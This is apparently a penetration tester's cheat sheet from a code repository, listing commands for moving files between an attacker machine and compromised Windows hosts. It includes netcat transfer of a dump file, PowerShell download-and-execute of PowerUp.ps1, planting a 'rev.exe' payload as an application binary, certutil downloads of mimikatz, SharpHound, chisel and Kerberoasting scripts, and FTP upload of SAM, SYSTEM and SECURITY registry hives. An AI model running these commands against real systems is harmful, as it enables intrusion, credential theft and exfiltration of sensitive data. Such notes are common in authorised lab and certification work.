-
Notifications
You must be signed in to change notification settings - Fork 1
/
mxtransfer
47 lines (42 loc) · 1.7 KB
/
mxtransfer
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
---------------------
nc -nvlp 443 > secret.dmp
nc -w3 -nv 192.168.162.46 443 < secret.dmp
---------------------
cd ~\tools\privesc_windows
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share `pwd` -smb2support
cd C:\windows\temp\
copy \\192.168.162.46\share\*
---------------------
Powershell
powershell wget 192.168.162.46/SharpHound.exe -O SharpHound.exe
Powershell Invoke-WebRequest "http://192.168.162.46/winPEAS.exe" -OutFile winPEAS.exe
powershell IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.162.46/PowerUp.ps1')
powershell (New-Object System.Net.WebClient).Downloadfile('http://192.168.162.46/rev.exe','rev.exe')
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://192.168.162.46/rev.exe', 'C:\Program Files\Bad App\App.exe')"
---------------------
cd ~\tools\privesc_windows
python -m SimpleHTTPServer 80
python3 -m http.server 80
certutil -urlcache -split -f http://192.168.162.46:80/nc.exe
certutil -urlcache -split -f http://192.168.162.46:80/chisel.exe
certutil -urlcache -split -f http://192.168.162.46:80/chisel-amd64.exe
certutil -urlcache -split -f http://192.168.162.46:80/mimikatz_64.exe
certutil -urlcache -split -f http://192.168.162.46:80/PowerUp.ps1
certutil -urlcache -split -f http://192.168.162.46:80/SharpHound.exe
certutil -urlcache -split -f http://192.168.162.46:80/winPEASx64.exe
certutil -urlcache -split -f http://192.168.162.46:80/Invoke-Kerberoast.ps1
---------------------
sudo pip3 install pyftpdlib
pip install cryptography==38.0.4
sudo python3 -m pyftpdlib -p 21 -u mike -P helps -w
ftp 192.168.162.46
user mike helps
passive
PUT samx
PUT systemx
PUT securityx
binary
GET mimikatz_64.exe
bye
---------------------
Consider: mxpivot